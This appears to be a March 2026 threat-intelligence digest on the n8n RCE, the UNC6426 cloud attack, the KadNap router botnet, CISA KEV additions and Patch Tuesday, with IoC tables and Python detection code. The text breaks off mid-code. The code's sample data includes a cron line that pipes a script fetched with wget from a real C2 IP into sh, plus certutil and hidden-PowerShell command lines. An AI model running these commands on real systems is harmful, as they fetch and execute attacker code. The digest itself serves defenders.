1. n8n RCE (CVE-2025-68613) — CISA KEV, Active Exploitation Confirmed
Summary
n8n’s workflow expression evaluator is being actively exploited in the wild. CISA added CVE-2025-68613 (CVSS 9.9) to its KEV catalog on March 11, 2026, the first n8n flaw to make the list. Over 24,700 unpatched instances remain internet-exposed, 12,300+ of them in North America. Any authenticated user can escape the expression sandbox and execute arbitrary code with the privileges of the n8n process. A second critical flaw in the same expression evaluator (CVE-2026-27577, CVSS 9.4) was disclosed the same day by Pillar Security. FCEB agencies must patch by March 25, 2026.
What’s New (Last 24 Hours)
- CISA added CVE-2025-68613 to KEV on 2026-03-11 based on confirmed active exploitation evidence.
- Pillar Security disclosed CVE-2026-27577 (CVSS 9.4) — a second exploitable path in the same n8n expression evaluator (Hacker News, 2026-03-11).
- Shadowserver data: 24,700+ unpatched public instances as of early March 2026; no specific exploit mechanism details released publicly.
- Fixed in n8n versions 1.120.4, 1.121.1 and 1.122.0 (December 2025 patch). The fix shipped per release line, so 1.121.0 is still vulnerable even though it is numerically newer than 1.120.4; compare each instance against the fixed release for the line it runs.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| n8n process spawning unexpected child processes (shell, python, etc.) post-authentication | TTP | T1059 | EDR process telemetry | Alert on node / n8n parent process spawning interpreter children (bash, sh, python, cmd) |
| Authenticated HTTP POST to n8n /rest/ or /webhook/ endpoints resulting in OS execution | TTP | T1059.007 | Web/App logs | Hunt for n8n HTTP 200 responses on /rest/workflows/ followed by unexpected outbound connections |
| Outbound connections from n8n process to external IPs following workflow execution | TTP | T1071.001 | EDR network telemetry, Proxy | Alert on n8n process initiating outbound connections to non-whitelisted IPs |
| n8n version strings below the fixed release for their line (1.120.4, 1.121.1, 1.122.0) in HTTP response headers or service banners | Indicator | T1190 | Asset inventory, Web server logs | Inventory exposed n8n instances; compare per release line, since 1.121.0 sorts above 1.120.4 but is still unpatched |
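Because the fix landed on three release lines, a flat "version < 1.120.4" check misclassifies 1.121.0 as safe. The following is an added example (not n8n's or CISA's code) that triages an exposed-instance inventory per release line; the only facts it takes from this section are the three fixed releases, while the banner format and the inventory rows are constructed.

```python
"""Branch-aware n8n version triage for CVE-2025-68613.

Added example, not n8n's or CISA's code. The only facts taken from the
advisory are the fixed releases 1.120.4, 1.121.1 and 1.122.0; the banner
format ("n8n/X.Y.Z") and the inventory rows are constructed sample input.
"""
import re

# First fixed release on each affected line, per the advisory.
FIXED = {
    (1, 120): (1, 120, 4),
    (1, 121): (1, 121, 1),
}
# Every release line at or above this one shipped fixed from its first release.
FIXED_FROM_LINE = (1, 122)

# Assumed banner shape: "n8n/1.120.4" or "n8n 1.120.4"; anything else is "unknown".
_VERSION_RE = re.compile(r"\bn8n[/ ](\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def parse_version(banner):
    """Return (major, minor, patch) from an n8n banner, or None if it exposes none."""
    m = _VERSION_RE.search(banner or "")
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(version):
    """True when `version` predates the fix on its own release line.

    A flat `< 1.120.4` compare gets 1.121.0 wrong: it sorts above 1.120.4 yet
    ships without the fix, which first appears on that line in 1.121.1.
    """
    line = version[:2]
    if line >= FIXED_FROM_LINE:
        return False
    if line in FIXED:
        return version < FIXED[line]
    return True  # older lines (1.119 and below) never received the fix


def triage(inventory):
    """inventory: list of (host, banner) -> list of (host, version, vulnerable|None)."""
    results = []
    for host, banner in inventory:
        v = parse_version(banner)
        results.append((host, v, None if v is None else is_vulnerable(v)))
    return results


# Constructed sample inventory: hostnames and banners are made up.
SAMPLE_INVENTORY = [
    ("n8n-a.example", "n8n/1.120.4"),
    ("n8n-b.example", "n8n/1.121.0"),      # numerically above 1.120.4, still vulnerable
    ("n8n-c.example", "n8n/1.119.2"),
    ("n8n-d.example", "n8n/1.122.3"),
    ("n8n-e.example", "nginx/1.25.3"),     # reverse proxy hides the n8n version
]

if __name__ == "__main__":
    for host, version, vuln in triage(SAMPLE_INVENTORY):
        state = "unknown" if vuln is None else ("VULNERABLE" if vuln else "fixed")
        print(f"{host:16} {str(version):16} {state}")
```

Instances that return "unknown" are not safe to ignore: a reverse proxy that strips the banner still fronts an n8n that may be unpatched, so those hosts need an authenticated version check rather than a banner grab.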
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
2. UNC6426: nx npm Supply Chain → GitHub OIDC → AWS Admin in 72 Hours
Summary
Google’s Cloud Threat Horizons H1 2026 report detailed a full cloud compromise executed by threat actor UNC6426, all stemming from the August 2025 nx npm supply chain attack. The attacker used stolen GitHub Personal Access Tokens (PATs), extracted by the QUIETVAULT credential stealer, to abuse the victim's GitHub-to-AWS OIDC trust, escalate to AWS administrator, exfiltrate S3 data, destroy EC2/RDS production instances, and rename the victim's GitHub repositories to s1ngularity-repository-* while flipping them to public. Total time from stolen token to full cloud destruction: under 72 hours.
What’s New (Last 24 Hours)
- Google Cloud Threat Horizons H1 2026 published 2026-03-11 — first public case study of UNC6426 post-compromise chain.
- Full attack path documented: QUIETVAULT stealer → GitHub PAT → Nord Stream CI/CD secret extraction → OIDC STS token → CloudFormation stack deploy → AdministratorAccess IAM role → S3 exfil + EC2/RDS destruction.
- Detection hints published: hunt for CreateStack events with CAPABILITY_NAMED_IAM + AdministratorAccess policy attachment; hunt for repo rename events matching the s1ngularity-repository-* pattern.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| QUIETVAULT JavaScript credential stealer (postinstall script in trojanized nx package) | Malware | T1195.002 | EDR file/process telemetry | Alert on postinstall scripts spawning processes that read env variables or access ~/.npmrc, ~/.gitconfig, SSH key paths |
| GitHub PAT exfiltration to public repo /s1ngularity-repository-1 | TTP | T1552.001 | GitHub Audit Logs | Alert on GitHub repo creation events with pattern s1ngularity-repository-*; monitor for PAT usage from anomalous geo/IP |
| Nord Stream tool (--aws-role parameter) used to extract CI/CD secrets | Tool | T1552.004 | CI/CD logs, CloudTrail | Hunt for sts:AssumeRoleWithWebIdentity calls from GitHub Actions service accounts outside expected workflow context |
| AWS CreateStack with CAPABILITY_NAMED_IAM + arn:aws:iam::aws:policy/AdministratorAccess | TTP | T1098 | AWS CloudTrail | Alert on cloudformation:CreateStack events attaching AdministratorAccess managed policy to new IAM roles |
| GitHub repo bulk rename to s1ngularity-repository-[random] + visibility set to public | TTP | T1485 | GitHub Audit Logs | Alert on bulk repository rename events + visibility change to public within a short time window |
| EC2/RDS instance termination following IAM privilege escalation | TTP | T1485 | CloudTrail | Correlate IAM role creation events with subsequent ec2:TerminateInstances / rds:DeleteDBInstance calls |
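The three CloudTrail hunts in the table (the admin CreateStack, the out-of-context AssumeRoleWithWebIdentity, and destruction correlated with the privilege grant) are short enough to run over raw event JSON. The block below is an added example, not Google's or AWS's code: it implements those hunts against constructed events whose field names follow CloudTrail's record format but whose account, role and repository values are made up. The OIDC check keys on the token subject because a tool that pushes its own branch and workflow to a legitimate repo changes the ref in the subject even though the repo itself is expected.

```python
"""CloudTrail hunts for the UNC6426 chain summarised above.

Added example, not Google's or AWS's code. The three checks follow the
published hints: a CreateStack with CAPABILITY_NAMED_IAM whose template
attaches AdministratorAccess, a GitHub OIDC role assumption whose subject is
not one the org expects, and destructive EC2/RDS calls shortly after that
grant. Event bodies are constructed; field names follow CloudTrail's record
format, values are made up.
"""
import json
from datetime import datetime, timedelta

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
GITHUB_OIDC = "token.actions.githubusercontent.com"
DESTRUCTIVE = {"TerminateInstances", "DeleteDBInstance", "DeleteBucket"}


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def admin_stack_deploy(event):
    """CreateStack that requests CAPABILITY_NAMED_IAM and embeds AdministratorAccess."""
    if event.get("eventName") != "CreateStack":
        return False
    params = event.get("requestParameters") or {}
    caps = params.get("capabilities") or []
    return "CAPABILITY_NAMED_IAM" in caps and ADMIN_POLICY in (params.get("templateBody") or "")


def oidc_outside_allowlist(event, allowed_subjects):
    """AssumeRoleWithWebIdentity from GitHub whose token subject is not allow-listed.

    CloudTrail records WebIdentityUser callers with the provider in
    userIdentity.identityProvider and the token subject in userIdentity.userName;
    GitHub subjects look like `repo:ORG/REPO:ref:refs/heads/BRANCH`.
    """
    if event.get("eventName") != "AssumeRoleWithWebIdentity":
        return False
    ident = event.get("userIdentity") or {}
    if GITHUB_OIDC not in ident.get("identityProvider", ""):
        return False
    return ident.get("userName", "") not in allowed_subjects


def destruction_after_grant(events, window=timedelta(hours=72)):
    """Destructive calls in the same account within `window` after an admin-stack deploy."""
    grants = [(_ts(e), e["recipientAccountId"]) for e in events if admin_stack_deploy(e)]
    hits = []
    for e in events:
        if e.get("eventName") not in DESTRUCTIVE:
            continue
        if any(acct == e["recipientAccountId"] and t <= _ts(e) <= t + window for t, acct in grants):
            hits.append((e["eventName"], e["eventTime"]))
    return hits


def run_hunts(events, allowed_subjects):
    return {
        "admin_stack": [e["eventTime"] for e in events if admin_stack_deploy(e)],
        "oidc_anomaly": [e["userIdentity"]["userName"] for e in events
                         if oidc_outside_allowlist(e, allowed_subjects)],
        "destruction_after_grant": destruction_after_grant(events),
    }


# Constructed sample: one account, a legitimate OIDC assumption, one from a pushed
# branch, the admin stack, then destruction inside and outside the 72-hour window.
ACCT = "111122223333"
ALLOWED_SUBJECTS = {"repo:victim-org/infra:ref:refs/heads/main"}
SAMPLE_EVENTS = [
    {"eventTime": "2025-08-27T01:10:00Z", "eventName": "AssumeRoleWithWebIdentity",
     "recipientAccountId": ACCT, "userIdentity": {"type": "WebIdentityUser",
     "identityProvider": GITHUB_OIDC, "userName": "repo:victim-org/infra:ref:refs/heads/main"}},
    {"eventTime": "2025-08-27T01:12:00Z", "eventName": "AssumeRoleWithWebIdentity",
     "recipientAccountId": ACCT, "userIdentity": {"type": "WebIdentityUser",
     "identityProvider": GITHUB_OIDC, "userName": "repo:victim-org/infra:ref:refs/heads/tmp-secrets"}},
    {"eventTime": "2025-08-27T01:20:00Z", "eventName": "CreateStack", "recipientAccountId": ACCT,
     "requestParameters": {"stackName": "ops-helper", "capabilities": ["CAPABILITY_NAMED_IAM"],
     "templateBody": json.dumps({"Resources": {"Role": {"Type": "AWS::IAM::Role",
     "Properties": {"ManagedPolicyArns": [ADMIN_POLICY]}}}})}},
    {"eventTime": "2025-08-28T14:00:00Z", "eventName": "TerminateInstances", "recipientAccountId": ACCT},
    {"eventTime": "2025-09-15T09:00:00Z", "eventName": "DeleteDBInstance", "recipientAccountId": ACCT},
]

if __name__ == "__main__":
    print(json.dumps(run_hunts(SAMPLE_EVENTS, ALLOWED_SUBJECTS), indent=2))
```

The allow-list of subjects is the control that matters: the same principle applies to the IAM trust policy itself, where a `StringEquals` on the GitHub `sub` claim (rather than a wildcard on the repo) would have prevented a pushed branch from assuming the role in the first place.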
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
3. KadNap Botnet — ASUS Routers Hijacked via Kademlia DHT P2P C2
Summary
Black Lotus Labs (Lumen) has published a full analysis of KadNap, a router botnet first detected in August 2025 that has now compromised 14,000+ edge devices, mostly ASUS routers but also any ARM/MIPS edge device with an unpatched RCE vulnerability. What makes KadNap notable is a custom Kademlia DHT (Distributed Hash Table) implementation that hides C2 server IPs inside a peer-to-peer network, so blocklisting a handful of C2 addresses does not on its own cut infected nodes off from the operator. Infected nodes are then leased as anonymous proxies through the “Doppelgänger” criminal proxy service (believed to be a rebrand of the Faceless service that previously powered the TheMoon botnet). Over 60% of victims are US-based. Lumen has blocked all known C2 traffic and released IoCs into public feeds.
What’s New (Last 24 Hours)
- Lumen Black Lotus Labs full technical analysis published 2026-03-10 with IoCs and malware behavior.
- THN follow-up published 2026-03-12 with additional victim geographic breakdown and Doppelgänger proxy service linkage.
- Ars Technica coverage 2026-03-12 — emphasis on takedown-resistance due to DHT C2.
- Key artifacts: dropper script aic.sh pulled from 212.104.141[.]140; persistence ELF renamed to .asusrouter; cron job runs at the 55-minute mark every hour; executable renamed to kad; port 22 closed by fwr.sh and /tmp/.sose files.
- Doppelgänger proxy service: doppelganger[.]shop, launched May/June 2025; claims 50+ country coverage.
- C2 IPs from secondary botnet version: 74.194.191[.]52, 38.59.219[.]27, 83.252.42[.]112.
- SHA-256: 691e4ec280aaff33270f33a9bb48a3fc38e2bd91c7359e687e3f0bd682f20b54
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| 212.104.141[.]140 — Initial dropper C2 (aic.sh download server) | IP IOC | T1190 | Firewall/proxy logs, DNS | Block/alert on outbound connections to this IP from SOHO/edge device ranges |
| 74.194.191[.]52 · 38.59.219[.]27 · 83.252.42[.]112 — Secondary botnet C2 IPs | IP IOC | T1571 | Firewall, NetFlow | Alert on outbound traffic to these IPs from router/gateway management segments |
| /jffs/.asusrouter — Hidden persistence script file path | File IOC | T1053.003 | File integrity monitoring, EDR | Alert on creation of .asusrouter hidden file in /jffs/ on router filesystems |
| kad — ELF binary filename (Kademlia DHT implant) | File IOC | T1027 | EDR file telemetry | Alert on new ELF binary creation with filename kad on Linux/embedded systems |
| Cron job created to run at minute 55 every hour pulling remote shell script | TTP | T1053.003 | Cron/syslog, EDR | Hunt for cron entries containing external URLs or curl/wget at interval 55 |
| fwr.sh / /tmp/.sose — Scripts closing SSH (port 22) and extracting C2 IP lists | TTP | T1562.004 | System logs, network monitoring | Alert on iptables DROP rules being applied to port 22 by non-administrative processes |
| 691e4ec280aaff33270f33a9bb48a3fc38e2bd91c7359e687e3f0bd682f20b54 — KadNap ELF SHA-256 | Hash IOC | T1027 | EDR, VirusTotal | Hash-match on file scan telemetry |
| doppelganger[.]shop — Criminal proxy service domain | Domain IOC | T1090 | DNS, Proxy logs | Alert on DNS resolution or HTTP connections to this domain from enterprise egress |
| NTP query burst followed by Kademlia DHT peer lookups (non-standard UDP traffic on router) | TTP | T1071 | NetFlow, PCAP | Hunt for routers initiating high-volume UDP traffic to random IPs after NTP sync |
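Most of the KadNap rows are host or flow artifacts that can be checked with a few lines once the defanged IOCs are normalised. The block below is an added example, not Lumen's code: it refangs the published indicators and runs the crontab, flow, DNS and file-listing hunts from the table over constructed sample input. The crontab syntax shown is an assumption; the report only states that the job runs at minute 55 every hour and fetches a remote script.

```python
"""Router-side hunts for the KadNap artifacts listed above.

Added example, not Lumen's code. The IOCs are the defanged values from the
write-up; crontab lines, flow records, DNS queries and the file listing are
constructed sample input, and the exact crontab syntax KadNap installs is an
assumption (only "minute 55, every hour, fetches a remote script" is from the report).
"""
import re

# Defanged as published; refanged once so the hunts can compare raw values.
DEFANGED_C2 = ["212.104.141[.]140", "74.194.191[.]52", "38.59.219[.]27", "83.252.42[.]112"]
DEFANGED_DOMAINS = ["doppelganger[.]shop"]
HASHES = {"691e4ec280aaff33270f33a9bb48a3fc38e2bd91c7359e687e3f0bd682f20b54"}
HIDDEN_PATHS = {"/jffs/.asusrouter", "/tmp/.sose"}
IMPLANT_NAME = "kad"


def refang(ioc):
    return ioc.replace("[.]", ".").replace("hxxp", "http")


C2_IPS = {refang(x) for x in DEFANGED_C2}
C2_DOMAINS = {refang(x) for x in DEFANGED_DOMAINS}

_CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
_FETCH_RE = re.compile(r"\b(curl|wget)\b")
_REMOTE_RE = re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b")


def suspicious_cron(line):
    """Hourly job at minute 55 whose command pulls something over the network."""
    m = _CRON_RE.match(line.strip())
    if not m:
        return False
    minute, hour, _dom, _mon, _dow, cmd = m.groups()
    return minute == "55" and hour == "*" and bool(_FETCH_RE.search(cmd) and _REMOTE_RE.search(cmd))


def flow_hits(flows):
    """flows: list of (src, dst, dport). Returns flows whose destination is a known C2."""
    return [f for f in flows if f[1] in C2_IPS]


def dns_hits(queries):
    """queries: list of (client, qname). Returns lookups of the proxy-service domain."""
    return [q for q in queries if q[1].lower().rstrip(".") in C2_DOMAINS]


def file_hits(listing):
    """listing: list of (path, sha256). Flags hidden persistence paths, the kad name, or a hash match."""
    hits = []
    for path, digest in listing:
        name = path.rsplit("/", 1)[-1]
        if path in HIDDEN_PATHS or name == IMPLANT_NAME or digest.lower() in HASHES:
            hits.append(path)
    return hits


# Constructed sample inputs (private addresses, the cron text and the file digests are made up).
SAMPLE_CRON = [
    "55 * * * * /bin/sh -c 'wget -q -O - http://212.104.141.140/aic.sh | sh'",
    "0 3 * * * /sbin/logrotate /etc/logrotate.conf",
    "*/5 * * * * curl -s http://127.0.0.1/health",
    "55 2 * * * wget http://updates.example/firmware.bin",   # daily, not hourly
]
SAMPLE_FLOWS = [("192.168.1.1", "212.104.141.140", 80), ("192.168.1.1", "8.8.8.8", 53),
                ("192.168.1.1", "38.59.219.27", 4444)]
SAMPLE_DNS = [("10.0.0.7", "doppelganger.shop."), ("10.0.0.7", "example.com.")]
SAMPLE_FILES = [("/jffs/.asusrouter", "0" * 64), ("/tmp/kad", next(iter(HASHES))),
                ("/bin/busybox", "1" * 64)]

if __name__ == "__main__":
    print([line for line in SAMPLE_CRON if suspicious_cron(line)])
    print(flow_hits(SAMPLE_FLOWS), dns_hits(SAMPLE_DNS), file_hits(SAMPLE_FILES))
```

The IP and hash matches are the weakest signals here, since the DHT design means the operator can rotate addresses without touching infected nodes; the cron and hidden-file checks survive that rotation and are the ones worth scheduling on devices you can actually log into.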
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
4. CISA Triple KEV: SolarWinds WHD + Ivanti EPM + Workspace One SSRF
Summary
CISA added three actively exploited enterprise vulnerabilities to KEV on March 9, 2026. The most urgent: SolarWinds Web Help Desk’s AjaxProxy deserialization bug (CVE-2025-26399, CVSS 9.8) is being actively exploited by the Warlock ransomware crew for initial access. The Ivanti Endpoint Manager credential-leak auth bypass (CVE-2026-1603, CVSS 8.6) has a known exploitation IP. The legacy Workspace One SSRF (CVE-2021-22054) is being chained with other SSRF vulns in coordinated campaigns. FCEB deadline for SolarWinds patch: today, March 12, 2026. Remaining two due March 23, 2026.
What’s New (Last 24 Hours)
- CISA KEV triple-add published 2026-03-09; THN coverage 2026-03-11.
- Warlock ransomware crew confirmed as exploitation actor for CVE-2025-26399 (SolarWinds WHD AjaxProxy deserialization → RCE).
- CVE-2026-1603 exploitation IP confirmed: 103.69.224[.]98 (Ivanti EPM auth bypass).
- CVE-2021-22054 (Workspace One SSRF) being chained with other SSRF vulns — GreyNoise flagged coordinated multi-product SSRF campaign.
- FCEB deadline for SolarWinds WHD patch is today (2026-03-12).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| 103.69.224[.]98 — Exploitation IP for Ivanti EPM CVE-2026-1603 auth bypass | IP IOC | T1190 | Firewall/WAF logs, Web logs | Block/alert on inbound connections from this IP to Ivanti EPM management interfaces |
| HTTP POST to /helpdesk/WebObjects/Helpdesk.woa/ws/ (SolarWinds WHD AjaxProxy endpoint) with deserialization payload patterns | TTP | T1190 | Web/App logs, WAF | Alert on requests to WHD AjaxProxy endpoint with unexpected content types or large binary payloads |
| Unauthenticated outbound HTTP requests from Workspace One UEM server to internal/arbitrary IPs (SSRF) | TTP | T1090.002 | Web proxy, Firewall | Alert on UEM server initiating outbound connections to RFC1918 ranges or metadata services |
| Warlock ransomware: SolarWinds WHD exploitation for initial access → lateral movement | TTP | T1133 | Auth logs, VPN/RDP logs | Alert on administrative access from SolarWinds WHD process context; hunt for LOLBin execution under WHD service account |
| Ivanti EPM stored credential leak via unauthenticated path bypass | TTP | T1078 | Web logs, Auth logs | Hunt for successful access to Ivanti EPM API endpoints without preceding authentication events; correlate with 103.69.224[.]98 |
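The WHD and Ivanti rows both reduce to request-level heuristics on the web tier. The block below is an added example, not CISA's or either vendor's code: it assumes a reverse-proxy or WAF log that records source IP, method, path, request content type, body size and the first bytes of the body (field names constructed), and flags AjaxProxy POSTs with an unexpected content type, an oversized body, or a Java serialized-stream header, plus any EPM request from the published exploitation IP. The serialization signature (AC ED 00 05 raw, "rO0AB" once base64 encoded) is a generic deserialization heuristic rather than a published IoC for CVE-2025-26399, and the WHD content-type allow-list is an assumption to tune against your own traffic.

```python
"""Web-log hunts for the SolarWinds WHD and Ivanti EPM items above.

Added example, not CISA's or either vendor's code. Assumes a reverse-proxy or
WAF log with constructed field names (src, method, path, content_type,
bytes_in, body_prefix, app). The Java serialized-stream signature is a generic
deserialization heuristic, not a published IoC for CVE-2025-26399.
"""
import base64

WHD_AJAXPROXY = "/helpdesk/WebObjects/Helpdesk.woa/ws/"
IVANTI_KEV_IPS = {"103.69.224.98"}           # defanged on the page as 103.69.224[.]98
WHD_EXPECTED_CT = {"application/x-www-form-urlencoded", "application/json",
                   "text/xml", "application/xml"}   # assumption: tune to observed traffic
LARGE_BODY = 64 * 1024
JAVA_MAGIC_RAW = b"\xac\xed\x00\x05"
JAVA_MAGIC_B64 = b"rO0AB"                    # base64 of the four bytes above always starts this way


def whd_tags(rec):
    """Heuristics for a POST under the WHD AjaxProxy path; returns matched tag names."""
    tags = []
    if rec["method"] != "POST" or not rec["path"].startswith(WHD_AJAXPROXY):
        return tags
    ct = rec.get("content_type", "").split(";")[0].strip().lower()
    if ct not in WHD_EXPECTED_CT:
        tags.append("whd-unexpected-content-type")
    if rec.get("bytes_in", 0) > LARGE_BODY:
        tags.append("whd-large-body")
    body = rec.get("body_prefix", b"")
    if body.startswith(JAVA_MAGIC_RAW) or JAVA_MAGIC_B64 in body:
        tags.append("whd-java-serialized")
    return tags


def ivanti_tags(rec):
    """Any request from the published exploitation IP to the EPM application."""
    if rec.get("app") == "ivanti-epm" and rec["src"] in IVANTI_KEV_IPS:
        return ["ivanti-kev-source-ip"]
    return []


def hunt(records):
    """Return (src, path, tags) for every record that matched at least one heuristic."""
    out = []
    for rec in records:
        tags = whd_tags(rec) + ivanti_tags(rec)
        if tags:
            out.append((rec["src"], rec["path"], tags))
    return out


# Constructed sample log: documentation-range addresses, made-up bodies; the
# "AjaxProxy" suffix is a sample path, the page names only the /ws/ prefix.
SAMPLE_PATH = WHD_AJAXPROXY + "AjaxProxy"
SAMPLE_LOG = [
    {"app": "whd", "src": "198.51.100.10", "method": "POST", "path": SAMPLE_PATH,
     "content_type": "application/x-www-form-urlencoded", "bytes_in": 512,
     "body_prefix": b"action=ticketSearch&q=printer"},
    {"app": "whd", "src": "198.51.100.66", "method": "POST", "path": SAMPLE_PATH,
     "content_type": "application/octet-stream", "bytes_in": 210_000,
     "body_prefix": JAVA_MAGIC_RAW + b"sr\x00\x11java.util.HashMap"},
    {"app": "whd", "src": "198.51.100.67", "method": "POST", "path": SAMPLE_PATH,
     "content_type": "text/xml; charset=utf-8", "bytes_in": 3_000,
     "body_prefix": b"<arg>" + base64.b64encode(JAVA_MAGIC_RAW + b"sr\x00\x11java.util.HashMap") + b"</arg>"},
    {"app": "ivanti-epm", "src": "103.69.224.98", "method": "GET", "path": "/",
     "content_type": "", "bytes_in": 0, "body_prefix": b""},
    {"app": "ivanti-epm", "src": "203.0.113.5", "method": "GET", "path": "/",
     "content_type": "", "bytes_in": 0, "body_prefix": b""},
]

if __name__ == "__main__":
    for src, path, tags in hunt(SAMPLE_LOG):
        print(f"{src:16} {path:45} {', '.join(tags)}")
```

The third sample record is the one worth noting: a payload wrapped in an expected content type and a modest body size trips only the serialization check, so a rule keyed on content type and size alone would miss it.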
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
5. March 2026 Patch Tuesday — Six “More Likely Exploited” LPE Flaws
Summary
March 2026 Patch Tuesday dropped 80+ patches, with zero actively exploited zero-days but six vulnerabilities rated “more likely to be exploited”, all local privilege escalation paths to SYSTEM or Admin. The most notable is CVE-2026-24291 in ATBroker.exe (Windows Accessibility Infrastructure): it escalates all the way to SYSTEM rather than stopping at Admin, which is the level an attacker needs to tamper with or disable EDR agents. Print Spooler gets another authenticated RCE (CVE-2026-23669). Two Office RCE bugs (CVE-2026-26110 and CVE-2026-26113) are exploitable via the Preview Pane. An Excel XSS bug (CVE-2026-26144) could coerce the Copilot Agent into exfiltrating data.
What’s New (Last 24 Hours)
- Microsoft released March 2026 Patch Tuesday updates on 2026-03-11 patching 84 CVEs.
- Six LPE vulnerabilities flagged “more likely to be exploited”: CVE-2026-24289 and CVE-2026-26132 (Windows Kernel use-after-free), CVE-2026-23668 (Windows Graphics race condition), CVE-2026-24294 (SMB Server improper auth), CVE-2026-25187 (Winlogon), CVE-2026-24291 (ATBroker.exe).
- CVE-2026-24291 (ATBroker.exe): SYSTEM-level — particularly high-value for post-compromise LPE.
- CVE-2026-23669: Print Spooler authenticated RCE — another in a long line of Spooler bugs reaching weaponization.
- CVE-2026-26144: Excel XSS capable of triggering Copilot Agent data exfiltration — novel attack class.
- Two publicly disclosed (not yet exploited) zero-days: CVE-2026-21262 (SQL Server, SQLAdmin privilege escalation), CVE-2026-26127 (.NET DoS).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| ATBroker.exe spawning unexpected child processes, or modifications to registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility (CVE-2026-24291) | TTP | T1068 | EDR process/registry telemetry | Alert on ATBroker.exe spawning cmd/powershell children, and on writes to the Accessibility registry keys by unexpected processes |
| Print Spooler service (spoolsv.exe) spawning unexpected child processes (CVE-2026-23669) | TTP | T1068 | EDR process telemetry | Alert on spoolsv.exe spawning cmd, wscript, powershell, or cscript children |
| Kernel use-after-free exploitation patterns: process from non-SYSTEM parent acquiring SYSTEM token (CVE-2026-24289, CVE-2026-26132) | TTP | T1068 | EDR process integrity | Alert on user-mode process integrity change from Medium to System without explicit service context |
| SMB Server improper auth (CVE-2026-24294): unexpected SMB session authentication without prior Kerberos/NTLM negotiation | TTP | T1021.002 | Windows Security event logs | Alert on Event ID 4624/4625 with unusual logon type from SMB sessions targeting unpatched systems |
| Winlogon (winlogon.exe) creating unexpected child processes or writing new DLL paths (CVE-2026-25187) | TTP | T1547 | EDR process/file telemetry | Alert on winlogon.exe spawning non-standard children or creating files in System32 |
| Excel .xlsx file previewed in Outlook triggering network connections (CVE-2026-26110, CVE-2026-26113) | TTP | T1566.001 | Email logs, EDR network telemetry | Hunt for Excel/Outlook preview pane process initiating outbound network connections |
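Most rows in this table, and the node/n8n row in section 1, are the same shape of rule: a specific parent should never spawn an interpreter, and a child should not run at System when its parent did not. The block below is an added example, not Microsoft's or n8n's code, that encodes those pairs as a small rule table and evaluates it over process-creation events in a Sysmon Event ID 1-like shape (ParentImage, Image, User, IntegrityLevel). It assumes the events have been enriched with the parent's integrity level, which Sysmon does not record directly; the sample events are constructed, and the interpreter list is a starting point to tune rather than a published allow-list.

```python
"""Parent/child process rules for the Patch Tuesday rows above and the
section 1 n8n row (node/n8n parent spawning an interpreter).

Added example, not Microsoft's or n8n's code. Consumes Sysmon Event ID 1-like
events enriched with the parent's integrity level (an assumed enrichment step).
Sample events are constructed; the interpreter list is a tuning starting point.
"""
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "parent image user integrity parent_integrity cmdline")

INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "bash", "sh", "dash", "python", "python3", "perl"}

# parent basename -> rule name; any interpreter child under these parents is a hit
RULES = {
    "atbroker.exe": "atbroker-lpe",            # CVE-2026-24291
    "spoolsv.exe": "spooler-rce",              # CVE-2026-23669
    "winlogon.exe": "winlogon-lpe",            # CVE-2026-25187
    "excel.exe": "office-preview-pane",        # CVE-2026-26110 / CVE-2026-26113
    "outlook.exe": "office-preview-pane",
    "node": "n8n-expression-rce",              # CVE-2025-68613 (section 1)
    "n8n": "n8n-expression-rce",
}
RANKS = {"low": 0, "medium": 1, "high": 2, "system": 3}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(ev):
    """Return the rule names an event trips (empty list when it looks normal)."""
    hits = []
    parent, child = basename(ev.parent), basename(ev.image)
    if parent in RULES and child in INTERPRETERS:
        hits.append(RULES[parent])
    # Kernel UAF row: a child at System spawned from a Medium/Low parent with no
    # service in between is an integrity jump. Non-Windows events carry "n/a".
    if RANKS.get(ev.integrity.lower(), -1) == 3 and RANKS.get(ev.parent_integrity.lower(), 3) <= 1:
        hits.append("integrity-jump")
    return hits


def scan(events):
    """(parent, image, hits) for every event that tripped at least one rule."""
    out = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            out.append((ev.parent, ev.image, hits))
    return out


# Constructed sample events (users, paths and command lines are made up).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\AtBroker.exe", r"C:\Windows\System32\cmd.exe",
              r"NT AUTHORITY\SYSTEM", "System", "Medium", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\spoolsv.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"NT AUTHORITY\SYSTEM", "System", "System", "powershell -nop -w hidden"),
    ProcEvent(r"C:\Windows\System32\winlogon.exe", r"C:\Windows\System32\userinit.exe",
              r"NT AUTHORITY\SYSTEM", "System", "System", "userinit.exe"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe", r"CORP\alice", "Medium", "Medium",
              "cmd.exe /c certutil -urlcache -f"),
    ProcEvent("/usr/local/bin/node", "/bin/sh", "n8n", "n/a", "n/a", "sh -c id"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
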